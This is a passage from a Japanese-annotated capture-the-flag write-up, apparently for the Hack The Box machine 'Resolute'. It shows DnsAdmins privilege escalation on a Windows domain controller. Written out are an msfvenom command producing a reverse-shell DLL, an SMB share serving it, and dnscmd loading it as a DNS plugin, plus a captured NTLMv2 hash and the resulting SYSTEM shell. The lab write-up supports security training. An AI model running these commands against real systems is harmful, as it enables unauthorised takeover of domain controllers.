NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
- 評価
- DNSAdminのためDNSを利用した攻撃ができそう
DNS関係の調査
# process確認
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-Process -Name dns
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
5299 3689 69168 68032 844 0 dns
# dnscmdコマンドの確認
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd /Info
Query result:
Server info
server name = Resolute.megabank.local
version = 3839000A (10.0 build 14393)
DS container = cn=MicrosoftDNS,cn=System,DC=megabank,DC=local
forest name = megabank.local
domain name = megabank.local
builtin forest partition = ForestDnsZones.megabank.local
builtin domain partition = DomainDnsZones.megabank.local
read only DC = 0
last scavenge cycle = not since restart (0)
Configuration:
dwLogLevel = 00000000
dwDebugLevel = 00000000
dwRpcProtocol = 00000005
dwNameCheckFlag = 00000002
cAddressAnswerLimit = 0
dwRecursionRetry = 3
dwRecursionTimeout = 8
dwDsPollingInterval = 180
Configuration Flags:
fBootMethod = 3
fAdminConfigured = 1
fAllowUpdate = 1
fDsAvailable = 1
fAutoReverseZones = 1
fAutoCacheUpdate = 0
fSlave = 0
fNoRecursion = 0
fRoundRobin = 1
fStrictFileParsing = 0
fLooseWildcarding = 0
fBindSecondaries = 0
fWriteAuthorityNs = 0
fLocalNetPriority = 1
Aging Configuration:
ScavengingInterval = 0
DefaultAgingState = 0
DefaultRefreshInterval = 168
DefaultNoRefreshInterval = 168
ServerAddresses:
Ptr = 00000192FEBAF370
MaxCount = 1
AddrCount = 1
Addr[0] => af=2, salen=16, [sub=0, flag=00000000] p=13568, addr=10.10.10.169
ListenAddresses:
NULL IP Array.
Forwarders:
NULL IP Array.
forward timeout = 3
slave = 0
Command completed successfully.
# Serviceの確認
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe query dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents>
- 評価
- DNSは動いているし権限はあるのでDNSを利用した権限昇格ができそう
Priviledge Escalation
Kali端末
# KaliでDNS起動時に読み込ませるDLL作成
┌──(kali㉿kali)-[~/Resolute]
└─$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.4 LPORT=4444 -f dll --platform windows > rev.dll
# Kaliでsmbserverを立ち上げる shareは共有名 ./はディレクトリパス
┌──(kali㉿kali)-[~/Resolute]
└─$ sudo impacket-smbserver share ./
[sudo] password for kali:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,55298)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:0e557196bd8edb9b9b2487eb38d8205a:010100000000000000a92a98f73dda01943a90eda68f9fe60000000001
# 別ターミナルでncatを待ち受ける
```bash
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -vlnp 4444
listening on [any] 4444 ...
Victim端末
# dnscmdコマンドでKaliのsmbserverにあるdllを登録
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd resolute.megabank.local /config /serverlevelplugindll \\10.10.16.4\share\rev.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
# DNSの停止
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
# DNSの起動
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 3184
FLAGS :
# Serviceの確認
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
ServerLevelPluginDll : \\10.10.16.4\share\rev.dll
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS
PSChildName : Parameters
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
# DNSの状態確認
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-Service dns
Status Name DisplayName
------ ---- -----------
Running dns DNS Server
成功した時の状態
# smbserver
┌──(kali㉿kali)-[~/Resolute]
└─$ sudo impacket-smbserver share ./
[sudo] password for kali:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,55298)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:0e557196bd8edb9b9b2487eb38d8205a:010100000000000000a92a98f73dda01943a90eda68f9fe600000000010010006d006900520071005400740059006200030010006d00690052007100540074005900620002001000610065005a00510046004b006b00580004001000610065005a00510046004b006b0058000700080000a92a98f73dda0106000400020000000800300030000000000000000000000000400000ca9d33ca5328ab97005c3e74242716f2dbb549652b73135970b0931f6faea6a10a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0034000000000000000000
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:SHARE)
[*] Closing down connection (10.10.10.169,55298)
[*] Remaining connections []
# nc
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -vlnp 4444
listening on [any] 4444 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.169] 55299
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Discussion